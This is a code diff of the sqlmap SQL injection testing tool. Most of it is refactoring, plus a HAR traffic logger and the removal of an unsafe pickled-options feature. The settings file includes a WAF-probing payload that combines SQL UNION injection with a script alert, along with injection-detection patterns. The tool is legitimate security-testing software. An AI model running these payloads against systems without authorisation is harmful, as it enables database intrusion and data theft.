@@ -2587,18 +2611,19 @@ def runningAsAdmin():
return isAdmin
def logHTTPTraffic(requestLogMsg, responseLogMsg):
def logHTTPTraffic(requestLogMsg, responseLogMsg, startTime=None, endTime=None):
"""
Logs HTTP traffic to the output file
"""
if not conf.trafficFile:
return
if conf.harFile:
conf.httpCollector.collectRequest(requestLogMsg, responseLogMsg, startTime, endTime)
with kb.locks.log:
dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep))
dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep))
dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep))
if conf.trafficFile:
with kb.locks.log:
dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep))
dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep))
dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep))
def getPageTemplate(payload, place): # Cross-linked function
raise NotImplementedError
@@ -2928,6 +2953,58 @@ def setOptimize():
debugMsg = "turning off switch '--null-connection' used indirectly by switch '-o'"
logger.debug(debugMsg)
def saveConfig(conf, filename):
"""
Saves conf to configuration filename
"""
config = UnicodeRawConfigParser()
userOpts = {}
for family in optDict.keys():
userOpts[family] = []
for option, value in conf.items():
for family, optionData in optDict.items():
if option in optionData:
userOpts[family].append((option, value, optionData[option]))
for family, optionData in userOpts.items():
config.add_section(family)
optionData.sort()
for option, value, datatype in optionData:
if datatype and isListLike(datatype):
datatype = datatype[0]
if option in IGNORE_SAVE_OPTIONS:
continue
if value is None:
if datatype == OPTION_TYPE.BOOLEAN:
value = "False"
elif datatype in (OPTION_TYPE.INTEGER, OPTION_TYPE.FLOAT):
if option in defaults:
value = str(defaults[option])
else:
value = "0"
elif datatype == OPTION_TYPE.STRING:
value = ""
if isinstance(value, basestring):
value = value.replace("\n", "\n ")
config.set(family, option, value)
with openFile(filename, "wb") as f:
try:
config.write(f)
except IOError, ex:
errMsg = "something went wrong while trying "
errMsg += "to write to the configuration file '%s' ('%s')" % (filename, getSafeExString(ex))
raise SqlmapSystemException(errMsg)
def initTechnique(technique=None):
"""
Prepares data for technique specified
@@ -3129,11 +3206,29 @@ def decodeIntToUnicode(value):
return retVal
def md5File(filename):
"""
Calculates MD5 digest of a file
Reference: http://stackoverflow.com/a/3431838
"""
checkFile(filename)
digest = hashlib.md5()
with open(filename, "rb") as f:
for chunk in iter(lambda: f.read(4096), ""):
digest.update(chunk)
return digest.hexdigest()
def checkIntegrity():
"""
Checks integrity of code files during the unhandled exceptions
"""
if not paths:
return
logger.debug("running code integrity check")
retVal = True
@@ -3142,7 +3237,7 @@ def checkIntegrity():
if not os.path.isfile(path):
logger.error("missing file detected '%s'" % path)
retVal = False
elif hashlib.md5(open(path, 'rb').read()).hexdigest() != checksum:
elif md5File(path) != checksum:
logger.error("wrong checksum of file '%s' detected" % path)
retVal = False
return retVal
@@ -3204,11 +3299,11 @@ def createGithubIssue(errMsg, excMsg):
msg += "with the unhandled exception information at "
msg += "the official Github repository? [y/N] "
try:
test = readInput(msg, default="N")
choice = readInput(msg, default='N', boolean=True)
except:
test = None
choice = None
if test and test[0] in ("y", "Y"):
if choice:
ex = None
errMsg = errMsg[errMsg.find("\n"):]
@@ -3372,11 +3467,32 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
else:
regex = r"%s\b" % regex
retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal)
_retVal = [retVal]
def _thread(regex):
try:
_retVal[0] = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, _retVal[0])
if len(parts) > 2:
regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
if len(parts) > 2:
regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
_retVal[0] = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, _retVal[0])
except KeyboardInterrupt:
raise
except:
pass
thread = threading.Thread(target=_thread, args=(regex,))
thread.daemon = True
thread.start()
thread.join(REFLECTED_REPLACEMENT_TIMEOUT)
if thread.isAlive():
kb.reflectiveMechanism = False
retVal = content
if not suppressWarning:
debugMsg = "turning off reflection removal mechanism (because of timeouts)"
logger.debug(debugMsg)
else:
retVal = _retVal[0]
if retVal != content:
kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
@@ -3433,11 +3549,11 @@ def safeSQLIdentificatorNaming(name, isTable=False):
if retVal.upper() in kb.keywords or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ("." if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS):
retVal = "`%s`" % retVal.strip("`")
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2):
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.SQLITE, DBMS.INFORMIX, DBMS.HSQLDB):
retVal = "\"%s\"" % retVal.strip("\"")
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,):
retVal = "\"%s\"" % retVal.strip("\"").upper()
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,) and ((retVal or " ")[0].isdigit() or not re.match(r"\A\w+\Z", retVal, re.U)):
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and ((retVal or " ")[0].isdigit() or not re.match(r"\A\w+\Z", retVal, re.U)):
retVal = "[%s]" % retVal.strip("[]")
if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal):
@@ -4031,7 +4147,7 @@ def decodeHexValue(value, raw=False):
retVal = value
if value and isinstance(value, basestring):
if len(value) % 2 != 0:
retVal = "%s?" % hexdecode(value[:-1])
retVal = "%s?" % hexdecode(value[:-1]) if len(value) > 1 else value
singleTimeWarnMessage("there was a problem decoding value '%s' from expected hexadecimal form" % value)
else:
retVal = hexdecode(value)
@@ -4285,6 +4401,9 @@ def getSafeExString(ex, encoding=None):
"""
Safe way how to get the proper exception represtation as a string
(Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161'))
>>> getSafeExString(Exception('foobar'))
u'foobar'
"""
retVal = ex
@@ -4294,4 +4413,4 @@ def getSafeExString(ex, encoding=None):
elif getattr(ex, "msg", None):
retVal = ex.msg
return getUnicode(retVal, encoding=encoding)
return getUnicode(retVal or "", encoding=encoding).strip()

2
lib/core/defaults.py
View File

@@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
from lib.core.datatype import AttribDict
_defaults = {
"csvDel": ",",
"csvDel": ',',
"timeSec": 5,
"googlePage": 1,
"verbose": 1,

1
lib/core/dicts.py
View File

@@ -274,6 +274,7 @@ DEPRECATED_OPTIONS = {
"--auth-private": "use '--auth-file' instead",
"--check-payload": None,
"--check-waf": None,
"--pickled-options": "use '--api -c ...' instead",
}
DUMP_DATA_PREPROCESS = {

18
lib/core/dump.py
View File

@@ -63,7 +63,7 @@ class Dump(object):
self._lock = threading.Lock()
def _write(self, data, newline=True, console=True, content_type=None):
if hasattr(conf, "api"):
if conf.api:
dataToStdout(data, content_type=content_type, status=CONTENT_STATUS.COMPLETE)
return
@@ -110,7 +110,7 @@ class Dump(object):
def string(self, header, data, content_type=None, sort=True):
kb.stickyLevel = None
if hasattr(conf, "api"):
if conf.api:
self._write(data, content_type=content_type)
return
@@ -144,7 +144,7 @@ class Dump(object):
except:
pass
if hasattr(conf, "api"):
if conf.api:
self._write(elements, content_type=content_type)
return
@@ -193,7 +193,7 @@ class Dump(object):
users = userSettings.keys()
users.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
if hasattr(conf, "api"):
if conf.api:
self._write(userSettings, content_type=content_type)
return
@@ -227,7 +227,7 @@ class Dump(object):
def dbTables(self, dbTables):
if isinstance(dbTables, dict) and len(dbTables) > 0:
if hasattr(conf, "api"):
if conf.api:
self._write(dbTables, content_type=CONTENT_TYPE.TABLES)
return
@@ -270,7 +270,7 @@ class Dump(object):
def dbTableColumns(self, tableColumns, content_type=None):
if isinstance(tableColumns, dict) and len(tableColumns) > 0:
if hasattr(conf, "api"):
if conf.api:
self._write(tableColumns, content_type=content_type)
return
@@ -344,7 +344,7 @@ class Dump(object):
def dbTablesCount(self, dbTables):
if isinstance(dbTables, dict) and len(dbTables) > 0:
if hasattr(conf, "api"):
if conf.api:
self._write(dbTables, content_type=CONTENT_TYPE.COUNT)
return
@@ -403,7 +403,7 @@ class Dump(object):
db = "All"
table = tableValues["__infos__"]["table"]
if hasattr(conf, "api"):
if conf.api:
self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
return
@@ -666,7 +666,7 @@ class Dump(object):
logger.warn(msg)
def dbColumns(self, dbColumnsDict, colConsider, dbs):
if hasattr(conf, "api"):
if conf.api:
self._write(dbColumnsDict, content_type=CONTENT_TYPE.COLUMNS)
return

2
lib/core/enums.py
View File

@@ -364,10 +364,12 @@ class MKSTEMP_PREFIX:
HASHES = "sqlmaphashes-"
CRAWLER = "sqlmapcrawler-"
IPC = "sqlmapipc-"
CONFIG = "sqlmapconfig-"
TESTING = "sqlmaptesting-"
RESULTS = "sqlmapresults-"
COOKIE_JAR = "sqlmapcookiejar-"
BIG_ARRAY = "sqlmapbigarray-"
SPECIFIC_RESPONSE = "sqlmapresponse-"
class TIMEOUT_STATE:
NORMAL = 0

3
lib/core/exception.py
View File

@@ -50,6 +50,9 @@ class SqlmapUserQuitException(SqlmapBaseException):
class SqlmapShellQuitException(SqlmapBaseException):
pass
class SqlmapSkipTargetException(SqlmapBaseException):
pass
class SqlmapSyntaxException(SqlmapBaseException):
pass

145
lib/core/option.py
View File

@@ -45,7 +45,6 @@ from lib.core.common import getConsoleWidth
from lib.core.common import getFileItems
from lib.core.common import getFileType
from lib.core.common import getUnicode
from lib.core.common import isListLike
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
from lib.core.common import openFile
@@ -58,12 +57,11 @@ from lib.core.common import readInput
from lib.core.common import resetCookieJar
from lib.core.common import runningAsAdmin
from lib.core.common import safeExpandUser
from lib.core.common import saveConfig
from lib.core.common import setOptimize
from lib.core.common import setPaths
from lib.core.common import singleTimeWarnMessage
from lib.core.common import UnicodeRawConfigParser
from lib.core.common import urldecode
from lib.core.convert import base64unpickle
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
@@ -112,8 +110,7 @@ from lib.core.settings import DEFAULT_PAGE_ENCODING
from lib.core.settings import DEFAULT_TOR_HTTP_PORTS
from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS
from lib.core.settings import DUMMY_URL
from lib.core.settings import IGNORE_SAVE_OPTIONS
from lib.core.settings import INJECT_HERE_MARK
from lib.core.settings import INJECT_HERE_REGEX
from lib.core.settings import IS_WIN
from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET
@@ -152,6 +149,7 @@ from lib.request.pkihandler import HTTPSPKIAuthHandler
from lib.request.rangehandler import HTTPRangeHandler
from lib.request.redirecthandler import SmartRedirectHandler
from lib.request.templates import getPageTemplate
from lib.utils.har import HTTPCollectorFactory
from lib.utils.crawler import crawl
from lib.utils.deps import checkDependencies
from lib.utils.search import search
@@ -243,6 +241,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
if schemePort:
scheme = schemePort.group(1)
port = schemePort.group(2)
request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip())
else:
scheme, port = None, None
@@ -281,7 +280,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
method = match.group(1)
url = match.group(2)
if any(_ in line for _ in ('?', '=', CUSTOM_INJECTION_MARK_CHAR)):
if any(_ in line for _ in ('?', '=', kb.customInjectionMark)):
params = True
getPostReq = True
@@ -321,7 +320,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
headers.append((getUnicode(key), getUnicode(value)))
if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
params = True
data = data.rstrip("\r\n") if data else data
@@ -486,14 +485,14 @@ def _setRequestFromFile():
conf.requestFile = safeExpandUser(conf.requestFile)
infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
logger.info(infoMsg)
if not os.path.isfile(conf.requestFile):
errMsg = "the specified HTTP request file "
errMsg = "specified HTTP request file '%s' " % conf.requestFile
errMsg += "does not exist"
raise SqlmapFilePathException(errMsg)
infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
logger.info(infoMsg)
_feedTargetsDict(conf.requestFile, addedTargetUrls)
def _setCrawler():
@@ -545,8 +544,7 @@ def _doSearch():
elif re.search(URI_INJECTABLE_REGEX, link, re.I):
if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork:
message = "do you want to scan only results containing GET parameters? [Y/n] "
test = readInput(message, default="Y")
kb.data.onlyGETs = test.lower() != 'n'
kb.data.onlyGETs = readInput(message, default='Y', boolean=True)
if not kb.data.onlyGETs or conf.googleDork:
kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
@@ -573,9 +571,8 @@ def _doSearch():
message += "for your search dork expression, but none of them "
message += "have GET parameters to test for SQL injection. "
message += "Do you want to skip to the next result page? [Y/n]"
test = readInput(message, default="Y")
if test[0] in ("n", "N"):
if not readInput(message, default='Y', boolean=True):
raise SqlmapSilentQuitException
else:
conf.googlePage += 1
@@ -596,7 +593,7 @@ def _setBulkMultipleTargets():
found = False
for line in getFileItems(conf.bulkFile):
if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
if re.match(r"[^ ]+\?(.+)", line, re.I) or kb.customInjectionMark in line:
found = True
kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None))
@@ -632,7 +629,7 @@ def _findPageForms():
logger.info(infoMsg)
if not any((conf.bulkFile, conf.googleDork, conf.sitemapUrl)):
page, _ = Request.queryPage(content=True)
page, _, _ = Request.queryPage(content=True)
findPageForms(page, conf.url, True, True)
else:
if conf.bulkFile:
@@ -949,14 +946,14 @@ def _setTamperingFunctions():
message = "it appears that you might have mixed "
message += "the order of tamper scripts. "
message += "Do you want to auto resolve this? [Y/n/q] "
test = readInput(message, default="Y")
choice = readInput(message, default='Y').upper()
if not test or test[0] in ("y", "Y"):
resolve_priorities = True
elif test[0] in ("n", "N"):
if choice == 'N':
resolve_priorities = False
elif test[0] in ("q", "Q"):
elif choice == 'Q':
raise SqlmapUserQuitException
else:
resolve_priorities = True
check_priority = False
@@ -1688,11 +1685,13 @@ def _cleanupOptions():
if conf.optimize:
setOptimize()
if conf.data:
conf.data = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.data, re.I)
match = re.search(INJECT_HERE_REGEX, conf.data or "")
if match:
kb.customInjectionMark = match.group(0)
if conf.url:
conf.url = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.url, re.I)
match = re.search(INJECT_HERE_REGEX, conf.url or "")
if match:
kb.customInjectionMark = match.group(0)
if conf.os:
conf.os = conf.os.capitalize()
@@ -1771,13 +1770,13 @@ def _cleanupOptions():
conf.torType = conf.torType.upper()
if conf.col:
conf.col = re.sub(r"\s*,\s*", ",", conf.col)
conf.col = re.sub(r"\s*,\s*", ',', conf.col)
if conf.excludeCol:
conf.excludeCol = re.sub(r"\s*,\s*", ",", conf.excludeCol)
conf.excludeCol = re.sub(r"\s*,\s*", ',', conf.excludeCol)
if conf.binaryFields:
conf.binaryFields = re.sub(r"\s*,\s*", ",", conf.binaryFields)
conf.binaryFields = re.sub(r"\s*,\s*", ',', conf.binaryFields)
if any((conf.proxy, conf.proxyFile, conf.tor)):
conf.disablePrecon = True
@@ -1833,6 +1832,7 @@ def _setConfAttributes():
conf.dumpPath = None
conf.hashDB = None
conf.hashDBFile = None
conf.httpCollector = None
conf.httpHeaders = []
conf.hostname = None
conf.ipv6 = False
@@ -1848,6 +1848,7 @@ def _setConfAttributes():
conf.scheme = None
conf.tests = []
conf.trafficFP = None
conf.HARCollectorFactory = None
conf.wFileType = None
def _setKnowledgeBaseAttributes(flushAll=True):
@@ -1867,6 +1868,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.authHeader = None
kb.bannerFp = AttribDict()
kb.binaryField = False
kb.browserVerification = None
kb.brute = AttribDict({"tables": [], "columns": []})
kb.bruteMode = False
@@ -1894,6 +1896,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.connErrorCounter = 0
kb.cookieEncodeChoice = None
kb.counters = {}
kb.customInjectionMark = CUSTOM_INJECTION_MARK_CHAR
kb.data = AttribDict()
kb.dataOutputFlag = False
@@ -1906,6 +1909,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.dnsMode = False
kb.dnsTest = None
kb.docRoot = None
kb.droppingRequests = False
kb.dumpColumns = None
kb.dumpTable = None
kb.dumpKeyboardInterrupt = False
@@ -1925,6 +1929,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.futileUnion = None
kb.headersFp = {}
kb.heuristicDbms = None
kb.heuristicExtendedDbms = None
kb.heuristicMode = False
kb.heuristicPage = False
kb.heuristicTest = None
@@ -2014,6 +2019,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.tableExistsChoice = None
kb.uChar = NULL
kb.unionDuplicates = False
kb.wafSpecificResponse = None
kb.xpCmdshellAvailable = False
if flushAll:
@@ -2107,53 +2113,7 @@ def _saveConfig():
debugMsg = "saving command line options to a sqlmap configuration INI file"
logger.debug(debugMsg)
config = UnicodeRawConfigParser()
userOpts = {}
for family in optDict.keys():
userOpts[family] = []
for option, value in conf.items():
for family, optionData in optDict.items():
if option in optionData:
userOpts[family].append((option, value, optionData[option]))
for family, optionData in userOpts.items():
config.add_section(family)
optionData.sort()
for option, value, datatype in optionData:
if datatype and isListLike(datatype):
datatype = datatype[0]
if option in IGNORE_SAVE_OPTIONS:
continue
if value is None:
if datatype == OPTION_TYPE.BOOLEAN:
value = "False"
elif datatype in (OPTION_TYPE.INTEGER, OPTION_TYPE.FLOAT):
if option in defaults:
value = str(defaults[option])
else:
value = "0"
elif datatype == OPTION_TYPE.STRING:
value = ""
if isinstance(value, basestring):
value = value.replace("\n", "\n ")
config.set(family, option, value)
confFP = openFile(conf.saveConfig, "wb")
try:
config.write(confFP)
except IOError, ex:
errMsg = "something went wrong while trying "
errMsg += "to write to the configuration file '%s' ('%s')" % (conf.saveConfig, getSafeExString(ex))
raise SqlmapSystemException(errMsg)
saveConfig(conf, conf.saveConfig)
infoMsg = "saved command line options to the configuration file '%s'" % conf.saveConfig
logger.info(infoMsg)
@@ -2229,26 +2189,6 @@ def _mergeOptions(inputOptions, overrideOptions):
@type inputOptions: C{instance}
"""
if inputOptions.pickledOptions:
try:
unpickledOptions = base64unpickle(inputOptions.pickledOptions, unsafe=True)
if type(unpickledOptions) == dict:
unpickledOptions = AttribDict(unpickledOptions)
_normalizeOptions(unpickledOptions)
unpickledOptions["pickledOptions"] = None
for key in inputOptions:
if key not in unpickledOptions:
unpickledOptions[key] = inputOptions[key]
inputOptions = unpickledOptions
except Exception, ex:
errMsg = "provided invalid value '%s' for option '--pickled-options'" % inputOptions.pickledOptions
errMsg += " (%s)" % repr(ex)
raise SqlmapSyntaxException(errMsg)
if inputOptions.configFile:
configFileParser(inputOptions.configFile)
@@ -2261,7 +2201,7 @@ def _mergeOptions(inputOptions, overrideOptions):
if key not in conf or value not in (None, False) or overrideOptions:
conf[key] = value
if not hasattr(conf, "api"):
if not conf.api:
for key, value in conf.items():
if value is not None:
kb.explicitSettings.add(key)
@@ -2295,6 +2235,12 @@ def _setTrafficOutputFP():
conf.trafficFP = openFile(conf.trafficFile, "w+")
def _setupHTTPCollector():
if not conf.harFile:
return
conf.httpCollector = HTTPCollectorFactory(conf.harFile).create()
def _setDNSServer():
if not conf.dnsDomain:
return
@@ -2456,6 +2402,10 @@ def _basicOptionValidation():
errMsg = "switch '--dump' is incompatible with switch '--search'"
raise SqlmapSyntaxException(errMsg)
if conf.api and not conf.configFile:
errMsg = "switch '--api' requires usage of option '-c'"
raise SqlmapSyntaxException(errMsg)
if conf.data and conf.nullConnection:
errMsg = "option '--data' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
@@ -2667,6 +2617,7 @@ def init():
_setTamperingFunctions()
_setWafFunctions()
_setTrafficOutputFP()
_setupHTTPCollector()
_resolveCrossReferences()
_checkWebSocket()

9
lib/core/optiondict.py
View File

@@ -77,8 +77,8 @@ optDict = {
"testParameter": "string",
"skip": "string",
"skipStatic": "boolean",
"skip": "string",
"paramExclude": "string",
"dbms": "string",
"dbmsCred": "string",
"os": "string",
"invalidBignum": "boolean",
@@ -196,6 +196,7 @@ optDict = {
"batch": "boolean",
"binaryFields": "string",
"charset": "string",
"checkInternet": "boolean",
"crawlDepth": "integer",
"crawlExclude": "string",
"csvDel": "string",
@@ -204,6 +205,7 @@ optDict = {
"flushSession": "boolean",
"forms": "boolean",
"freshQueries": "boolean",
"harFile": "string",
"hexConvert": "boolean",
"outputDir": "string",
"parseErrors": "boolean",
@@ -243,5 +245,10 @@ optDict = {
"liveTest": "boolean",
"stopFail": "boolean",
"runCase": "string",
},
"API": {
"api": "boolean",
"taskid": "string",
"database": "string",
}
}

22
lib/core/settings.py
View File

@@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import OS
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.1.4.0"
VERSION = "1.1.8.0"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -295,7 +295,7 @@ BLANK = "<blank>"
CURRENT_DB = "CD"
# Regular expressions used for finding file paths in error messages
FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line \d+", r"in (?P<result>[^<>]+?) on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"(?P<result>[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
# Regular expressions used for parsing error messages (--parse-errors)
ERROR_PARSING_REGEXES = (
@@ -366,7 +366,7 @@ CANDIDATE_SENTENCE_MIN_LENGTH = 10
CUSTOM_INJECTION_MARK_CHAR = '*'
# Other way to declare injection position
INJECT_HERE_MARK = '%INJECT HERE%'
INJECT_HERE_REGEX = '(?i)%INJECT[_ ]?HERE%'
# Minimum chunk length used for retrieving data over error based payloads
MIN_ERROR_CHUNK_LENGTH = 8
@@ -386,6 +386,9 @@ REFLECTED_BORDER_REGEX = r"[^A-Za-z]+"
# Regular expression used for replacing non-alphanum characters
REFLECTED_REPLACEMENT_REGEX = r".+"
# Maximum time (in seconds) spent per reflective value(s) replacement
REFLECTED_REPLACEMENT_TIMEOUT = 3
# Maximum number of alpha-numerical parts in reflected regex (for speed purposes)
REFLECTED_MAX_REGEX_PARTS = 10
@@ -450,6 +453,9 @@ LOW_TEXT_PERCENT = 20
# Reference: http://dev.mysql.com/doc/refman/5.1/en/function-resolution.html
IGNORE_SPACE_AFFECTED_KEYWORDS = ("CAST", "COUNT", "EXTRACT", "GROUP_CONCAT", "MAX", "MID", "MIN", "SESSION_USER", "SUBSTR", "SUBSTRING", "SUM", "SYSTEM_USER", "TRIM")
# Keywords expected to be in UPPERCASE in getValue()
GET_VALUE_UPPERCASE_KEYWORDS = ("SELECT", "FROM", "WHERE", "DISTINCT", "COUNT")
LEGAL_DISCLAIMER = "Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program"
# After this number of misses reflective removal mechanism is turned off (for speed up reasons)
@@ -472,7 +478,7 @@ DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\
# Extensions skipped by crawler
CRAWL_EXCLUDE_EXTENSIONS = ("3ds", "3g2", "3gp", "7z", "DS_Store", "a", "aac", "adp", "ai", "aif", "aiff", "apk", "ar", "asf", "au", "avi", "bak", "bin", "bk", "bmp", "btif", "bz2", "cab", "caf", "cgm", "cmx", "cpio", "cr2", "dat", "deb", "djvu", "dll", "dmg", "dmp", "dng", "doc", "docx", "dot", "dotx", "dra", "dsk", "dts", "dtshd", "dvb", "dwg", "dxf", "ear", "ecelp4800", "ecelp7470", "ecelp9600", "egg", "eol", "eot", "epub", "exe", "f4v", "fbs", "fh", "fla", "flac", "fli", "flv", "fpx", "fst", "fvt", "g3", "gif", "gz", "h261", "h263", "h264", "ico", "ief", "image", "img", "ipa", "iso", "jar", "jpeg", "jpg", "jpgv", "jpm", "jxr", "ktx", "lvp", "lz", "lzma", "lzo", "m3u", "m4a", "m4v", "mar", "mdi", "mid", "mj2", "mka", "mkv", "mmr", "mng", "mov", "movie", "mp3", "mp4", "mp4a", "mpeg", "mpg", "mpga", "mxu", "nef", "npx", "o", "oga", "ogg", "ogv", "otf", "pbm", "pcx", "pdf", "pea", "pgm", "pic", "png", "pnm", "ppm", "pps", "ppt", "pptx", "ps", "psd", "pya", "pyc", "pyo", "pyv", "qt", "rar", "ras", "raw", "rgb", "rip", "rlc", "rz", "s3m", "s7z", "scm", "scpt", "sgi", "shar", "sil", "smv", "so", "sub", "swf", "tar", "tbz2", "tga", "tgz", "tif", "tiff", "tlz", "ts", "ttf", "uvh", "uvi", "uvm", "uvp", "uvs", "uvu", "viv", "vob", "war", "wav", "wax", "wbmp", "wdp", "weba", "webm", "webp", "whl", "wm", "wma", "wmv", "wmx", "woff", "woff2", "wvx", "xbm", "xif", "xls", "xlsx", "xlt", "xm", "xpi", "xpm", "xwd", "xz", "z", "zip", "zipx")
# Patterns often seen in HTTP headers containing custom injection marking character
# Patterns often seen in HTTP headers containing custom injection marking character '*'
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
# Template used for common table existence check
@@ -487,6 +493,12 @@ IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")
# Data inside shellcodeexec to be filled with random string
SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
# Generic address for checking the Internet connection while using switch --check-internet
CHECK_INTERNET_ADDRESS = "http://ipinfo.io/"
# Value to look for in response to CHECK_INTERNET_ADDRESS
CHECK_INTERNET_VALUE = "IP Address Details"
# Vectors used for provoking specific WAF/IPS/IDS behavior(s)
WAF_ATTACK_VECTORS = (
"", # NIL
@@ -621,7 +633,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
CHECK_ZERO_COLUMNS_THRESHOLD = 10
# Boldify all logger messages containing these "patterns"
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA")
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response")
# Generic www root directory names
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")

212
lib/core/target.py
View File

@@ -9,6 +9,8 @@ import codecs
import functools
import os
import re
import subprocess
import sys
import tempfile
import time
import urlparse
@@ -18,6 +20,7 @@ from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import hashDBRetrieve
from lib.core.common import intersect
from lib.core.common import isNumPosStrValue
from lib.core.common import normalizeUnicode
from lib.core.common import openFile
from lib.core.common import paramToDict
@@ -49,7 +52,6 @@ from lib.core.option import _setKnowledgeBaseAttributes
from lib.core.option import _setAuthCred
from lib.core.settings import ASTERISK_MARKER
from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import HOST_ALIASES
from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
@@ -111,92 +113,107 @@ def _setRequestParams():
retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
else:
break
if CUSTOM_INJECTION_MARK_CHAR in retVal:
